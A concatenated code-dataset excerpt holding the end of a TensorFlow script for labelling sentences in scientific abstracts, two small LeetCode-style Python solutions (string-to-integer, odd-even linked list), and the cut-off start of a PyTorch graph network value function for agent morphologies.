FLAGS.eval_predict_checkpoint + FLAGS.article_predict_prefix +\n # '-scores-article.json'\n # )\n # with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n # json.dump(\n # article_scores_list, f, indent=2, sort_keys=False, cls=NumpyEncoder\n # )\n\n # assert sentence count\n print('assert sentence count')\n # parse task1_sample_submission.csv\n sentence_count = 0\n predict_sample_submission_path = Path(FLAGS.predict_sample_submission)\n with predict_sample_submission_path.open(\n encoding='utf-8', mode='r'\n ) as f, tqdm(\n dynamic_ncols=True,\n ascii=True,\n desc=predict_sample_submission_path.name,\n unit='lines'\n ) as t:\n rows = csv.DictReader(f)\n for row in rows:\n t.update()\n article, sentence = row['order_id'].split('_')\n if int(article[1:]) <= 20000:\n sentence_count += 1\n print(\n f'Sentences in {predict_sample_submission_path.name}: {sentence_count}'\n )\n print(f'Sentences in sentence_pred_list: {len(sentence_pred_list)}')\n # assert\n if len(sentence_pred_list) != 
sentence_count:\n print(f\"===DEBUG: len(sentence_pred_list) != sentence_count\")\n\n # write submission.csv\n print('write submission.csv')\n predict_sample_submission_path = Path(FLAGS.predict_sample_submission)\n output_path = Path(\n FLAGS.eval_predict_checkpoint + FLAGS.predict_prefix +\n '-submission-sentence.csv'\n )\n with predict_sample_submission_path.open(\n encoding='utf-8', mode='r'\n ) as f, output_path.open(encoding='utf-8', mode='w',\n newline='') as out_f, tqdm(\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc=predict_sample_submission_path.name,\n unit='lines'\n ) as t:\n rows = csv.DictReader(f)\n writer = csv.DictWriter(\n out_f,\n fieldnames=rows.fieldnames,\n quoting=csv.QUOTE_MINIMAL,\n lineterminator='\\n'\n )\n writer.writeheader()\n for i, row in enumerate(rows):\n t.update()\n if i < len(sentence_pred_list):\n predictions = sentence_pred_list[i]\n row['BACKGROUND'] = str(predictions[0])\n row['OBJECTIVES'] = str(predictions[1])\n row['METHODS'] = str(predictions[2])\n row['RESULTS'] = str(predictions[3])\n row['CONCLUSIONS'] = str(predictions[4])\n row['OTHERS'] = str(predictions[5])\n writer.writerow(row)\n\n # write submission-article.csv\n # print('write submission-article.csv')\n # predict_sample_submission_article_path = Path(FLAGS.predict_sample_submission_article)\n # output_path = Path(\n # FLAGS.eval_predict_checkpoint + FLAGS.article_predict_prefix +\n # '-submission-article.csv'\n # )\n # with predict_sample_submission_article_path.open(\n # encoding='utf-8', mode='r'\n # ) as f, output_path.open(encoding='utf-8', mode='w',\n # newline='') as out_f, tqdm(\n # dynamic_ncols=True,\n # ascii=True,\n # smoothing=0.1,\n # desc=predict_sample_submission_article_path.name,\n # unit='lines'\n # ) as t:\n # rows = csv.DictReader(f)\n # writer = csv.DictWriter(\n # out_f,\n # fieldnames=rows.fieldnames,\n # quoting=csv.QUOTE_MINIMAL,\n # lineterminator='\\n'\n # )\n # writer.writeheader()\n # for i, row in enumerate(rows):\n # t.update()\n # if i < len(article_pred_list):\n # predictions = article_pred_list[i]\n # row['THEORETICAL'] = str(predictions[0])\n # row['ENGINEERING'] = str(predictions[1])\n # row['EMPIRICAL'] = str(predictions[2])\n # row['OTHERS'] = str(predictions[3])\n # writer.writerow(row)\n elif FLAGS.job == 'train':\n while epoch_i < FLAGS.max_epochs or FLAGS.max_epochs == -1:\n tf.logging.info(f\"Starting epoch {epoch_i+1}/{FLAGS.max_epochs} of run {run_i}/{FLAGS.max_runs}\")\n eval_result_metrics, export_results = tf.estimator.train_and_evaluate(\n estimator, train_spec, eval_spec\n )\n tf.logging.info(f\"Finished epoch {epoch_i+1}/{FLAGS.max_epochs} of run {run_i}/{FLAGS.max_runs}\")\n epoch_i += 1\n continue\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.register('type', 'bool', lambda v: v.lower() == 'true')\n parser.register('type', 'list', lambda v: ast.literal_eval(v))\n\n parser.add_argument(\n '--model_dir',\n type=str,\n default='',\n help='Path for saving model checkpoints during training'\n )\n parser.add_argument(\n '--model_dir_prefix',\n type=str,\n default='',\n help='Path prefix for saving model checkpoints during training'\n )\n parser.add_argument(\n '--experiment_name',\n type=str,\n default='PARSE',\n help=\n 'Experiment name for logging purposes, if \"PARSE\", split model_dir by \"_\" and use the first part as the experiment name'\n )\n parser.add_argument(\n '--host_script_name',\n type=str,\n default='PARSE',\n help=\n 'Host script name for logging purposes (8086K1-1.2), 
if \"PARSE\", split model_dir by \"_\" and use the last part as the host script name'\n )\n parser.add_argument(\n '--job',\n type=str,\n choices=['train', 'eval', 'predict', 'dataprep', 'export', 'crossover'],\n default='train',\n help='Set job type to run'\n )\n parser.add_argument(\n '--max_epochs',\n type=int,\n default=-1, #\n help='Stop training and maybe start a new run after this many epochs. -1 to train forever'\n )\n parser.add_argument(\n '--max_runs',\n type=int,\n default=-1, #\n help='Stop training after this many runs. -1 to train forever'\n )\n parser.add_argument(\n '--export_dir',\n type=str,\n default='',\n help=\n 'Path for saving the exported SavedModel. Default: ${model_dir}/export'\n )\n parser.add_argument(\n '--export_checkpoint',\n type=str,\n default='',\n help=\n 'Checkpoint to export to SavedModel, ex: \"model_dir/step-380176\". Default: latest checkpoint in model_dir'\n )\n parser.add_argument(\n '--eval_predict_checkpoint',\n type=str,\n default='',\n help=\n 'Checkpoint to use for evaluation and prediction, ex: \"model_dir/step-380176\". Default: latest checkpoint in model_dir'\n )\n parser.add_argument(\n '--crossover_checkpoints',\n type=str,\n default='',\n help=\n 'Checkpoints to use for crossover'\n )\n parser.add_argument(\n '--crossover_output_prefix',\n type=str,\n default='',\n help='string to add to crossover output filenames'\n )\n parser.add_argument(\n '--crossover_weights',\n type='list',\n default='[0,101,10]',\n help='crossover weights'\n )\n parser.add_argument(\n '--predict_prefix',\n type=str,\n default='',\n help='string to add to prediction output filenames'\n )\n parser.add_argument(\n '--article_predict_prefix',\n type=str,\n default='',\n help='string to add to article prediction output filenames'\n )\n parser.add_argument(\n '--predict_data',\n type=str,\n default='',\n help='Path to predict data (tf.Example in TFRecord format)'\n )\n parser.add_argument(\n '--predict_sample_submission',\n type=str,\n default='',\n help='Path to the task1_sample_submission.csv file.'\n )\n parser.add_argument(\n '--predict_sample_submission_article',\n type=str,\n default='',\n help='Path to the task2_sample_submission.csv file.'\n )\n parser.add_argument(\n '--predict_threshold',\n type=float,\n default=0.5,\n help='predict_threshold.'\n )\n parser.add_argument(\n '--article_predict_threshold',\n type=float,\n default=0.5,\n help='article_predict_threshold.'\n )\n parser.add_argument(\n '--eval_dir',\n type=str,\n default='',\n help=\n 'Path for saving evaluation results. Default: ${model_dir}/eval-${global_step}'\n )\n parser.add_argument(\n '--eval_prefix',\n type=str,\n default='',\n help=\n 'Filename prefix for evaluation results. Default: ${model_dir}@${global_step}'\n )\n parser.add_argument(\n '--eval_format',\n type=str,\n choices=['json', 'msgpack', 'msgpack.gz'],\n default='json',\n help=\n 'File format of evaluation results, one of [\"json\", \"msgpack\", \"msgpack.gz\"]. Default: json'\n )\n parser.add_argument(\n '--eval_level',\n type=str,\n choices=['topk', 'min'],\n default='min',\n help=\n 'Amount of data saved by evaluation, one of [\"topk\", \"min\"]. 
Default: min'\n )\n parser.add_argument(\n '--eval_precision_recall_at_equal_thresholds',\n type='bool',\n default='False',\n help='Output metrics precision_recall_at_equal_thresholds'\n )\n parser.add_argument(\n '--predict_top_k',\n type=int,\n default=3, #\n help='Save only the top k most probable classes for each amino acid.'\n )\n parser.add_argument(\n '--training_data',\n type=str,\n # default='D:/datasets/pfam-regions-d0-s20/pfam-regions-d0-s20-train.tfrecords',\n default='D:/datasets/pfam-regions-d10-s20-train.tfrecords',\n help='Path to training data (tf.Example in TFRecord format)'\n )\n parser.add_argument(\n '--eval_data',\n type=str,\n # default='D:/datasets/pfam-regions-d0-s20/pfam-regions-d0-s20-test.tfrecords',\n default='D:/datasets/pfam-regions-d10-s20-test.tfrecords',\n help='Path to evaluation data (tf.Example in TFRecord format)'\n )\n parser.add_argument(\n '--data_version',\n type=str,\n default='v2',\n help=\n 'Data format version of training and evaluation data. v1 uses SequenceExample, v2 uses Example'\n )\n parser.add_argument(\n '--metadata_path',\n type=str,\n # default='D:/datasets/pfam-regions-d0-s20/pfam-regions-d0-s20-test.tfrecords',\n default='',\n help='Path to metadata.json generated by prep_dataset'\n )\n parser.add_argument(\n '--max_sentences',\n type=int,\n default=50, # current train test max is 26\n help='Maximum number of sentences per abstract.'\n )\n parser.add_argument(\n '--num_classes',\n type=int,\n # default=16712 + 3, # 'PAD', 'NO_DOMAIN', 'UNKNOWN_DOMAIN'\n default=-1, # 'PAD', 'NO_DOMAIN', 'UNKNOWN_DOMAIN'\n help='Number of domain classes.'\n )\n parser.add_argument(\n '--classes_file',\n type=str,\n default='',\n help='Path to a file with the classes - one class per line'\n )\n\n parser.add_argument(\n '--num_gpus',\n type=int,\n default=0,\n help='Number of GPUs to use, defaults to total number of gpus available.'\n )\n parser.add_argument(\n '--num_cpu_threads',\n type=int,\n default=0,\n help=\n 'Number of CPU threads to use, defaults to half the number of hardware threads.'\n )\n parser.add_argument(\n '--random_seed', type=int, default=-1, help='The random seed.'\n )\n parser.add_argument(\n '--use_xla',\n type='bool',\n default='False',\n help='Whether to enable JIT XLA.'\n )\n parser.add_argument(\n '--use_fp16',\n type='bool',\n default='False',\n help='Whether to enable automatic mixed precision.'\n )\n parser.add_argument(\n '--use_tensor_ops',\n type='bool',\n default='False',\n help='Whether to use tensorcores or not.'\n )\n parser.add_argument(\n '--save_summary_steps',\n type=int,\n default=100,\n help='Save summaries every this many steps.'\n )\n parser.add_argument(\n '--save_checkpoints_steps',\n type=int,\n default=100000,\n help='Save checkpoints every this many steps.'\n )\n parser.add_argument(\n '--save_checkpoints_secs',\n type=int,\n default=30 * 60,\n help='Save checkpoints every this many seconds.'\n )\n parser.add_argument(\n '--keep_checkpoint_max',\n type=int,\n default=1000,\n help='The maximum number of recent checkpoint files to keep.'\n )\n parser.add_argument(\n '--keep_checkpoint_every_n_hours',\n type=float,\n default=6,\n help='Keep an additional checkpoint every `N` hours.'\n )\n parser.add_argument(\n '--log_step_count_steps',\n type=int,\n default=10,\n help=\n 'The frequency, in number of global steps, that the global step/sec will be logged during training.'\n )\n parser.add_argument(\n '--eval_delay_secs',\n type=int,\n default=30 * 24 * 60 * 60,\n help=\n 'Start distributed continuous 
evaluation after waiting for this many seconds. Not used in local training.'\n )\n parser.add_argument(\n '--eval_throttle_secs',\n type=int,\n default=30 * 24 * 60 * 60,\n help='Stop training and start evaluation after this many seconds.'\n )\n\n parser.add_argument(\n '--steps',\n type=int,\n default=0, # 100000,\n help='Number of training steps, if 0 train forever.'\n )\n parser.add_argument(\n '--eval_steps',\n type=int,\n default=-1, # 100000,\n help='Number of evaluation steps, if 0, evaluates until end-of-input.'\n )\n\n parser.add_argument(\n '--dataset_buffer',\n type=int,\n default=256,\n help='Number of MB in the read buffer.'\n )\n parser.add_argument(\n '--dataset_parallel_reads',\n type=int,\n default=1,\n help='Number of input Datasets to interleave from in parallel.'\n )\n parser.add_argument(\n '--shuffle_buffer',\n type=int,\n default=16 * 1024,\n help='Maximum number elements that will be buffered when shuffling input.'\n )\n parser.add_argument(\n '--repeat_count',\n type=int,\n default=1,\n help='Number of times the dataset should be repeated.'\n )\n parser.add_argument(\n '--batch_size',\n type=int,\n default=1,\n help=\n 'Batch size to use for longest sequence for training/evaluation. 1 if GPU Memory <= 6GB, 2 if <= 12GB'\n )\n parser.add_argument(\n '--predict_batch_size',\n type=int,\n default=128,\n help='Batch size to use for for prediction.'\n )\n parser.add_argument(\n '--max_batch_size',\n type=int,\n default=128,\n help='Max batch size for short sequences'\n )\n parser.add_argument(\n '--prefetch_buffer',\n type=int,\n default=64,\n help='Maximum number of batches that will be buffered when prefetching.'\n )\n\n parser.add_argument(\n '--conv_catagorical_fields',\n type='list',\n default='[0,2,3,4]',\n help=\n 'Catagorical fields to feed into convolution bank, multiple choice: 0:\"year\", 1:\"title_features\", 2:\"categories_features\", 3:\"fields_features\", 4:\"authors_features\".'\n )\n parser.add_argument(\n '--dense_catagorical_fields',\n type='list',\n default='[0]',\n help=\n 'Catagorical fields to feed into dense layer, multiple choice: 0:\"year\", 1:\"title_features\", 2:\"categories_features\", 3:\"fields_features\", 4:\"authors_features\".'\n )\n parser.add_argument(\n '--sent_conv_catagorical_fields',\n type='list',\n default='[0,1,2,3,4]',\n help=\n 'Catagorical fields to add to sentence pooling, multiple choice: 0:\"year\", 1:\"title_features\", 2:\"categories_features\", 3:\"fields_features\", 4:\"authors_features\".'\n )\n parser.add_argument(\n '--segment_id_input',\n type='list',\n default='[2]',\n help=\n 'Locations to concat segment_id, multiple choice: 1:\"conv\", 2:\"rnn\", 3:\"dense\".'\n )\n # parser.add_argument(\n # '--hub_model',\n # type=str,\n # choices=[\n # 'bert_uncased_L-12_H-768_A-12', 'bert_uncased_L-24_H-1024_A-16', 'bert_cased_L-12_H-768_A-12'\n # ],\n # default='bert_uncased_L-12_H-768_A-12',\n # help='Hub Model'\n # )\n parser.add_argument(\n '--init_checkpoint_root',\n type=str,\n default=r'/data12/tbrain/scibert_scivocab_uncased',\n help='Initial checkpoint (usually from a pre-trained BERT model).'\n )\n parser.add_argument(\n '--ckpt_name',\n type=str,\n default='bert_model.ckpt',\n help='checkpoint name.'\n )\n parser.add_argument(\n '--title_init_checkpoint_root',\n type=str,\n default=r'/data12/tbrain/biobert_v1.1_pubmed',\n help='Initial checkpoint (usually from a pre-trained BERT model).'\n )\n parser.add_argument(\n '--title_ckpt_name',\n type=str,\n default='model.ckpt-1000000',\n help='checkpoint name.'\n )\n 
parser.add_argument(\n '--title_dense_units',\n type=int,\n default=256,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--authors_embed_dim',\n type=int,\n default=64,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--authors_rnn_units',\n type=int,\n default=64,\n help='Number of units for authors rnn.'\n )\n parser.add_argument(\n '--categories_embed_dim',\n type=int,\n default=256,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--categories_rnn_units',\n type=int,\n default=256,\n help='Number of units for authors rnn.'\n )\n parser.add_argument(\n '--fields_embed_dim',\n type=int,\n default=16,\n help='Number of units for authors embedding.'\n )\n parser.add_argument(\n '--fields_rnn_units',\n type=int,\n default=16,\n help='Number of units for authors rnn.'\n )\n parser.add_argument(\n '--input_norm',\n type=str,\n choices=['None', 'Batch', 'Layer'],\n default='Layer',\n help='Input Normalization'\n )\n parser.add_argument(\n '--rnn_norm',\n type=str,\n choices=['None', 'Batch', 'Layer'],\n default='Layer',\n help='RNN Normalization'\n )\n parser.add_argument(\n '--dense_norm',\n type=str,\n choices=['None', 'Batch', 'Layer'],\n default='None',\n help='Dense Normalization'\n )\n\n parser.add_argument(\n '--embed_dim', type=int, default=768, help='Embedding dimensions.'\n )\n parser.add_argument(\n '--use_xlnet_zero_seg_ids',\n type='bool',\n default='False',\n help='Use all zeros for segment_ids input.'\n )\n parser.add_argument(\n '--xlnet_dropout',\n type=float,\n default=0.1,\n help='Dropout rate used in xlnet layers.'\n )\n parser.add_argument(\n '--embedded_dropout',\n type=float,\n default=0.2,\n help='Dropout rate used after embedding layers.'\n )\n parser.add_argument(\n '--feature_dropout',\n type=float,\n default=0.4,\n help='Dropout rate used after feature rnn layers.'\n )\n\n parser.add_argument(\n '--conv_bank_size',\n type=int,\n default=15,\n help='Convolution bank kernal sizes 1 to bank_size.'\n )\n parser.add_argument(\n '--conv_filters',\n type=int,\n default=32,\n help='Number of convolution filters.'\n )\n parser.add_argument(\n '--conv_kernel_size',\n type=int,\n default=7,\n help='Length of the convolution filters.'\n )\n parser.add_argument(\n '--conv_strides',\n type=int,\n default=1,\n help=\n 'The number of entries by which the filter is moved right at each step..'\n )\n parser.add_argument(\n '--conv_dropout',\n type=float,\n default=0.3,\n help='Dropout rate used for convolution layer outputs.'\n )\n parser.add_argument(\n '--use_conv_batch_norm',\n type='bool',\n default='True',\n help='Apply batch normalization after convolution layers.'\n )\n parser.add_argument(\n '--use_conv_residual',\n type='bool',\n default='True',\n help='Add residual connection after convolution layer 1.'\n )\n parser.add_argument(\n '--use_rnn_residual',\n type='bool',\n default='False',\n help='Add residual connection after rnn layer.'\n )\n parser.add_argument(\n '--use_dense_residual',\n type='bool',\n default='False',\n help='Add residual connection after dense layer.'\n )\n parser.add_argument(\n '--use_conv_highway',\n type='bool',\n default='True',\n help='Add a highway network after convolution layer 1.'\n )\n parser.add_argument(\n '--conv_highway_depth',\n type=int,\n default=3,\n help='Number of layers of highway network.'\n )\n parser.add_argument(\n '--conv_highway_units',\n type=int,\n default=1248,\n help='Number of units per layer of highway network.'\n )\n\n 
parser.add_argument(\n '--rnn_cell_type',\n type=str,\n choices=['LSTM', 'GRU', 'encoder', 'None'],\n default='GRU',\n help='RNN Cell Type'\n )\n parser.add_argument(\n '--rnn_num_units',\n type='list',\n default='[128]',\n help='Number of node per recurrent network layer.'\n )\n parser.add_argument(\n '--rnn_dropout',\n type=float,\n default=0.0,\n help='Dropout rate used between rnn layers.'\n )\n parser.add_argument(\n '--rnn_recurrent_dropout',\n type=float,\n default=0.0,\n help=\n 'Dropout rate used between rnn timesteps, needs to be 0.0 to use cudnn.'\n )\n parser.add_argument(\n '--dense_units',\n type='list',\n # default='[256,128,64]',\n default='[None]',\n help='Number of units for the dense layers.'\n )\n parser.add_argument(\n '--dense_dropout',\n type=float,\n default=0.4,\n help='Dropout rate used after dense layers.'\n )\n parser.add_argument(\n '--attend_to',\n type=str,\n default='abstract',\n help='field to attend to'\n )\n parser.add_argument(\n '--word_num_layers',\n type=int,\n default=1,\n help='The number of transformer decoder layers.'\n )\n parser.add_argument(\n '--word_d_model',\n type=int,\n default=768,\n help='Number of units for attention v, k, q, and final linear transforms.'\n )\n parser.add_argument(\n '--word_dff_x',\n type=int,\n default=4,\n help=\n 'Number of units for the Point wise feed forward network, normally 4X d_model.'\n )\n parser.add_argument(\n '--word_dropout_rate',\n type=float,\n default=0.1,\n help='Dropout rate for transformer embedding.'\n )\n parser.add_argument(\n '--sent_num_layers',\n type=int,\n default=1,\n help='The number of transformer decoder layers.'\n )\n parser.add_argument(\n '--sent_d_model',\n type=int,\n default=768,\n help='Number of units for attention v, k, q, and final linear transforms.'\n )\n parser.add_argument(\n '--sent_dff_x',\n type=int,\n default=4,\n help=\n 'Number of units for the Point wise feed forward network, normally 4X d_model.'\n )\n parser.add_argument(\n '--sent_dropout_rate',\n type=float,\n default=0.1,\n help='Dropout rate for transformer embedding.'\n )\n parser.add_argument(\n '--use_transformer_positional_encoding',\n type='bool',\n default='True',\n help='Add positional encoding to transformer input.'\n )\n\n parser.add_argument(\n '--sent_pool_abstract_features',\n type='bool',\n default='False',\n help='Pool abstract features with word output.'\n )\n parser.add_argument(\n '--sent_conv_bank_size',\n type=int,\n default=15,\n help='Convolution bank kernal sizes 1 to bank_size.'\n )\n parser.add_argument(\n '--sent_rnn_cell_type',\n type=str,\n choices=['LSTM', 'GRU', 'encoder', 'decoder', 'None'],\n default='LSTM',\n help='RNN Cell Type'\n )\n parser.add_argument(\n '--sent_rnn_num_units',\n type='list',\n default='[128]',\n help='Number of node per recurrent network layer.'\n )\n parser.add_argument(\n '--sent_dense_units',\n type='list',\n # default='[256,128,64]',\n default='[None]',\n help='Number of units for the dense layers.'\n )\n parser.add_argument(\n '--arti_dense_units',\n type='list',\n # default='[256,128,64]',\n default='[None]',\n help='Number of units for the dense layers.'\n )\n\n parser.add_argument(\n '--use_crf',\n type='bool',\n default='False',\n help='Calculate loss using linear chain CRF instead of Softmax.'\n )\n parser.add_argument(\n '--use_batch_renorm',\n type='bool',\n default='True',\n help='Use Batch Renormalization.'\n )\n parser.add_argument(\n '--loss_type',\n type=str,\n choices=['softmax', 'sigmoid'],\n default='sigmoid',\n help='Loss function'\n 
)\n parser.add_argument(\n '--scale_label',\n type=float,\n default=0.925,\n help='Scale labels to keep weights from exploding.'\n )\n parser.add_argument(\n '--loss_pos_weight',\n type=float,\n default=1.8,\n help=\n 'A value pos_weight > 1 decreases the false negative count, hence increasing the recall. Conversely setting pos_weight < 1 decreases the false positive count and increases the precision.'\n )\n parser.add_argument(\n '--article_loss_pos_weight',\n type=float,\n default=1.8,\n help=\n 'A value pos_weight > 1 decreases the false negative count, hence increasing the recall. Conversely setting pos_weight < 1 decreases the false positive count and increases the precision.'\n )\n\n parser.add_argument(\n '--clip_gradients_std_factor',\n type=float,\n default=2., # num_batches_per_epoch * num_epochs_per_decay(8)\n help=\n 'If the norm exceeds `exp(mean(log(norm)) + std_factor*std(log(norm)))` then all gradients will be rescaled such that the global norm becomes `exp(mean)`.'\n )\n parser.add_argument(\n '--clip_gradients_decay',\n type=float,\n default=0.95,\n help='The smoothing factor of the moving averages.'\n )\n parser.add_argument(\n '--clip_gradients_static_max_norm',\n type=float,\n default=6.,\n help=\n 'If provided, will threshold the norm to this value as an extra safety.'\n )\n\n parser.add_argument(\n '--no_bert_training_steps',\n type=int,\n default=224, # num_batches_per_epoch * num_epochs_per_decay(8)\n help='Decay learning_rate by decay_rate every decay_steps.'\n )\n parser.add_argument(\n '--learning_rate_decay_fn',\n type=str,\n default='exponential_decay',\n help=\n 'Learning rate decay function. One of \"none\", \"noisy_linear_cosine_decay\", \"exponential_decay\"'\n )\n parser.add_argument(\n '--learning_rate_decay_steps',\n type=int,\n default=2000, # num_batches_per_epoch * num_epochs_per_decay(8)\n help='Decay learning_rate by decay_rate every decay_steps.'\n )\n parser.add_argument(\n '--learning_rate_decay_rate',\n type=float,\n default=0.7,\n help='Learning rate decay rate.'\n )\n parser.add_argument(\n '--train_seg_embed',\n type='bool',\n default='False',\n help='Whether to train bias and seg_embed layers.'\n )\n parser.add_argument(\n '--freeze_layers',\n type=int,\n default=12, # \n help='How many pretrained layers to freeze.'\n )\n parser.add_argument(\n '--layer_decay_rate',\n type=float,\n default=1.0,\n help='Exponetially descrease the learning rate the further up the stack you go for pretrained layers. Top layer: lr[L] = FLAGS.learning_rate. Low layer: lr[l-1] = lr[l] * lr_layer_decay_rate.'\n )\n parser.add_argument(\n '--layer_warmup_steps',\n type=int,\n default=2000, # 200% epoch\n help='Learning rate warmup steps for pretrained layers.'\n )\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=0.001,\n help='Learning rate used for training.'\n )\n parser.add_argument(\n '--warmup_steps',\n type=int,\n default=250, # 10% epoch\n help='Learning rate warmup steps needed to reach specified learning_rate.'\n )\n parser.add_argument(\n '--warmup_repeat_steps',\n type=int,\n default=0, # 0 to disable repeat warmup\n help='Restart warmup every this many steps.'\n )\n parser.add_argument(\n '--warmup_start_lr',\n type=float,\n default=0.001,\n help='Learning rate warmup starting multiplier value.'\n )\n parser.add_argument(\n '--warmup_schedule',\n type=str,\n default='exp',\n help='Learning rate warmup schedule. 
One of \"exp\", \"linear\", \"none\"'\n )\n # learning rate defaults\n # Adagrad: 0.01\n # Adam: 0.001\n # RMSProp: 0.001\n # :\n # Nadam: 0.002\n # SGD: 0.01\n # Adamax: 0.002\n # Adadelta: 1.0\n parser.add_argument(\n '--optimizer',\n type=str,\n default='bertadam',\n help=\n 'Optimizer to use. One of \"Adam\", \"bertadam\", \"adamw\", \"Momentum\", \"Adagrad\", \"Ftrl\", \"RMSProp\", \"SGD\"'\n )\n parser.add_argument(\n '--adam_epsilon',\n type=float,\n default=1e-08,\n help=\n 'A small constant for numerical stability. This epsilon is \"epsilon hat\" in the Kingma and Ba paper (in the formula just before Section 2.1), not the epsilon in Algorithm 1 of the paper.'\n )\n\n parser.add_argument(\n '--check_nans',\n type='bool',\n default='False',\n help=\n 'Add runtime checks to spot when NaNs or other symptoms of numerical errors start occurring during training.'\n )\n parser.add_argument(\n '--trace',\n type='bool',\n default='False',\n help=\n 'Captures CPU/GPU profiling information in \"timeline-<step>.json\", which are in Chrome Trace format.'\n )\n parser.add_argument(\n '--debug', type='bool', default='False', help='Run debugging ops.'\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n FLAGS.command = ' '.join(sys.argv)\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","repo_name":"hotdogee/aicup2019-abstract-labeling","sub_path":"aicup1-v16.py","file_name":"aicup1-v16.py","file_ext":"py","file_size_in_byte":218627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"44069655001","text":"def solve(s):\n li = s.split()\n\n if len(li) == 0:\n return 0\n\n s = li[0]\n sign = 1\n if s[0] == '+' or s[0] == '-':\n if s[0] == '-':\n sign = -1\n s = s[1:len(s)]\n\n result = 0\n for i in range(len(s)):\n c = s[i]\n\n try:\n num = int(s[i])\n result = 10*result + num\n if sign * result < (-2 ** 31):\n return -2 ** 31\n elif (2 ** 31 - 1) < sign * result:\n return 2 ** 31 - 1\n except ValueError:\n return sign * result\n return sign * result\n\n\nprint(solve(\"42\"))\nprint(solve(\" -42\"))\nprint(solve(\"4193 with words\"))\nprint(solve(\"words and 987\"))\nprint(solve(\"-91283472332\"))\n","repo_name":"yoshikipom/leetcode","sub_path":"algorithms/0008.py","file_name":"0008.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33799285958","text":"# 链表的奇偶重排\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def oddEvenList(self , head: ListNode) -> ListNode:\n even = ListNode(0)\n odd = ListNode(1)\n p_even = even\n p_odd = odd\n count = 1\n\n while head:\n if count % 2 == 0:\n p_even.next = head\n p_even = p_even.next\n else:\n p_odd.next = head\n p_odd = p_odd.next\n head = head.next\n count += 1\n\n p_even.next = None\n p_odd.next = even.next\n return odd.next\n\n# 双指针\nclass Solution:\n def oddEvenList(self , head: ListNode) -> ListNode:\n if not head:\n return head\n \n odd, even = head, head.next\n evenhead = even\n\n while even and even.next:\n odd.next = even.next\n odd = odd.next\n even.next = odd.next\n even = even.next\n odd.next = evenhead\n \n return head\n \n \n","repo_name":"wenshuojie/Algorithm-progress","sub_path":"剑指101/BM14.py","file_name":"BM14.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38861648130","text":"import numpy as np\nimport torch\nfrom 
torch import nn\nfrom torch.nn import functional as F\nimport torch_geometric\n\nfrom optimal_agents.utils.loader import get_env, get_morphology\n\nfrom optimal_agents.algs.graph_rollout_buffer import obs_to_graph\nfrom optimal_agents.morphology import Morphology\n\nclass NodeMorphologyVF(nn.Module):\n\n def __init__(self, params, lr=0.001, batch_size=64, buffer_size=3072, include_segments=False, \n thompson=False):\n super().__init__()\n self.params = params\n self.buffer_size = buffer_size\n self.batch_size = batch_size\n self.thompson = thompson\n self.include_segments = include_segments\n\n if 'activation_fn' in self.params['policy_kwargs']:\n self.act_fn = vars(F)[self.params['policy_kwargs']['act_fn']]\n else:\n self.act_fn = torch.tanh\n if 'net_arch' in self.params['policy_kwargs']:\n net_arch = self.params['policy_kwargs']['net_arch']\n else:\n net_arch = [128, 128, 128]\n if 'graph_conv_class' in self.params['policy_kwargs']:\n graph_layer = vars(torch_geometric.nn)[self.params['policy_kwargs']['graph_conv_class']]\n else:\n graph_layer = torch_geometric.nn.GraphConv\n\n # Construct a test environment to get the input / output sizes\n test_morph = get_morphology(params)\n test_env = get_env(params, morphology=test_morph)\n self.morphology_graph_fn = test_env.get_morphology_obs # Make srue we have the correct conversion function.\n morphology_obs = self.morphology_graph_fn(test_morph, self.include_segments)\n \n last_layer_dim = morphology_obs['x'].shape[1] # Get the input size for each node.\n\n layers = []\n for layer in net_arch:\n layers.append(graph_layer(last_layer_dim, layer))\n last_layer_dim = layer\n self.last_extractor_dim = last_layer_dim\n self.layers = nn.ModuleList(layers)\n self.linear = torch.nn.Linear(last_layer_dim, 1)\n\n self.optim = torch.optim.Adam(self.parameters(), lr=lr)\n self.criterion = torch.nn.MSELoss()\n self.data = []\n self.test_dropout_mask = None\n\n test_env.close()\n del test_env # Force close this.\n\n def forward(self, graph, dropout_mask=None):\n x, edge_index = graph.x, graph.edge_index\n for layer in self.layers:\n x = layer(x, edge_index)\n x = self.act_fn(x)\n\n x = torch_geometric.nn.global_mean_pool(x, graph.batch) # Global pool before linear layer to support thompson dropout\n\n if self.thompson:\n if dropout_mask is None:\n dropout_mask = torch.distributions.Bernoulli(torch.full_like(x, 0.5)).sample() / 0.5\n x = x * dropout_mask\n\n x = self.linear(x)\n return x\n\n def update(self, data, n_epochs=8):\n self.test_dropout_mask = None # Set the dropout mask to None. 
We are no longer in the same assessment\n self.data.extend(data)\n if len(self.data) > self.buffer_size:\n num_over = len(self.data) - self.buffer_size\n del self.data[:num_over] # Remove the first num_over elements from the buffer\n\n # Normalize the data for the update.\n reward_values = [data_pt[1] for data_pt in self.data]\n reward_mean = np.mean(reward_values)\n reward_std = np.std(reward_values)\n\n for epoch in range(n_epochs):\n perm = np.random.permutation(len(self.data))\n num_full_batches = len(perm) // self.batch_size\n for i in range(num_full_batches + 1):\n if i != num_full_batches:\n inds = perm[i*self.batch_size:(i+1)*self.batch_size]\n else:\n inds = perm[i*self.batch_size:]\n if len(inds) == 0:\n continue\n y = torch.from_numpy(np.array([(self.data[ind][1] - reward_mean)/reward_std for ind in inds])).float().unsqueeze(-1)\n graph = torch_geometric.data.Batch.from_data_list([self.data[ind][0] for ind in inds])\n self.optim.zero_grad()\n values = self.forward(graph)\n assert values.shape == y.shape\n loss = self.criterion(values, y)\n loss.backward()\n self.optim.step()\n\n # Test Loss\n with torch.no_grad():\n print(len(self.data), \"DATA 